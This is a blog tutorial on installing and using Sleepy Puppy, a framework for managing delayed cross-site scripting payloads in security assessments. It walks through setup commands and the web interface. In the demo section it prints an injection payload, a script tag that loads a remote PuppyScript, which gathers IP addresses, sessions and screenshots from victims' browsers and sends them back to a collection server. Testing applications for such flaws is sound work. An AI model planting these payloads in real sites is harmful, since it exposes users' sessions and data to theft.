i Sleepy Puppy XSS Payload Management Framework – All things in moderation

Sleepy Puppy XSS Payload Management Framework

Sleepy Puppy is a XSS Payload Management Framework with a number of XSS payloads you can use.  We can create new assessments which will create unique payloads for identifying captures, each payload is associated with the “General” assessment by default. After you create an assessment, you can copy a payload from that assessment to inject in the application. When the script containing the payload is loaded in in that application or another application (delayed) the following events occur:

The PuppyScript file(s) associated with that payload are retrieved from the server. The payload with the | u | parameter which contains a unique identifier used to link the Payload with the capture and the | a | parameter which contains the assessment the payload is associated with. This is two important things you need to remember.

By default, only one Puppyscript runs which collects metadata and a screenshot where the payload was installed. The server also replaces associated variables and hostnames within the PuppyScript file. If you decide to write your own PuppyScripts you can use the following Jinja2 templates which will automatically be filled in when the PuppyScript is loaded:

  • {{payload}} this is a required field if your PuppyScript contains callbacks. This let’s Sleepy Puppy record which payload was fired before the capture.
  • {{assessment}} this is a required field if your PuppyScript contains callbacks. This let’s Sleepy Puppy map the capture with the correct assessment.
  • {{hostname}}
  • {{callback_protocol}}

Now I will show you how to install this framework:

  1. Install:
    – First we need to install: Python 2.7, Pip, Git. Then we use this command line clone file install:

    git clone https://github.com/sbehrens/sleepy-puppy.git

    – Setup a Virtual Environment:

    $sudo pip install virtualenv
    $cd sleepy-puppy/
    $virtualenv sleepyenv
    $source sleepyenv/bin/activate
    

    – Install the required dependencies:

    $python setup.py install
    

    – Create database, seed database, create default login with ‘admin’ user:
    We can do it by one statement:

    $python manage.py setup_sleepy_puppy
    

    Password entered will be used to log into the site manager with username=’admin’.
    Also can be installed on each command:

    $python manage.py create_db
    $python manage.py create_login admin
    $python manage.py create_bootstrap_assessment
    

    The basic installation steps has completed. Now we can test the operation of the sleepy-puppy:
    – Source Virtual Environment

    cd sleepy-puppy/
    source sleepyenv/bin/activate
    

    – Run the Flask Application

    python manage.py runserver –host 0.0.0.0 –port 8000
    

    login with username= admin and password entered during the installation process.

  2. How to use it:
    – After successful login , we see this screen:
    login_01
    – We could create assessment here:
    login_02
    In this assessment, “Snooze” is a customization helps when we attack an application is being attacked for bandwidth. Then the application will stop collecting information and data, and screenshots stop.
    “Run Once” – this means that the payload will be statements made once and prove that faulty application XSS not collect data relevant to the user.- Create USER:
    login_03
    We can create USER here. It helps us manage our own assessment easily.
    Assessments is account you create.
    Email is registered address to catch errors will be sent to that email.- Tag PuppyScript:
    This tag contains predefined script to be called back and make the task of taking XSS attacks as IP, Session, Screen short….
    login_04
    We can also create scripts to perform separate tasks.
    login_05
    – Tag Payload:
    This tag will use the net command to inject XSS error pages with src are with src are: “$S1”
    login_06
    We can create new payload:login_07
    As to the assessment, the ‘$ S1’ will be replaced by the system:
    src=//127.0.0.1:8000/x?u=1&a=1 with:
    127.0.0.1:8000 : is host address/domain_name and port open with service Sleepy-puppy.
    u: is id corresponding to your payload.
    a: is user id.
  3. We could use this framework to test now.
    Demo with wedsite:  http://xss-quiz.int21h.jp
    login_08
    – After inject successful statements :
    <script src=//127.0.0.1:8000/x?u=1&a=2></script>
    We obtained the tag Capture results:
    login_09
    – Based on the options of the command Puppyscript and the return value will contain different components. If we allow logging, the system will log every time corresponding inject.
    login_10
    – Generic Collector:
    login_11
    It contains information including the IP’s implementation.
    – Another thing, if you need the result send to your mail automatically, you need to config this:
    Config email:
    gedit sleepy-puppy/config-default.conflogin_12This post assumes you have already deployed Sleepy Puppy, have configured either SES or SMTP email, and have confirmed successful authentication to the web UI. I hope you will make fun with it.

Leave a Reply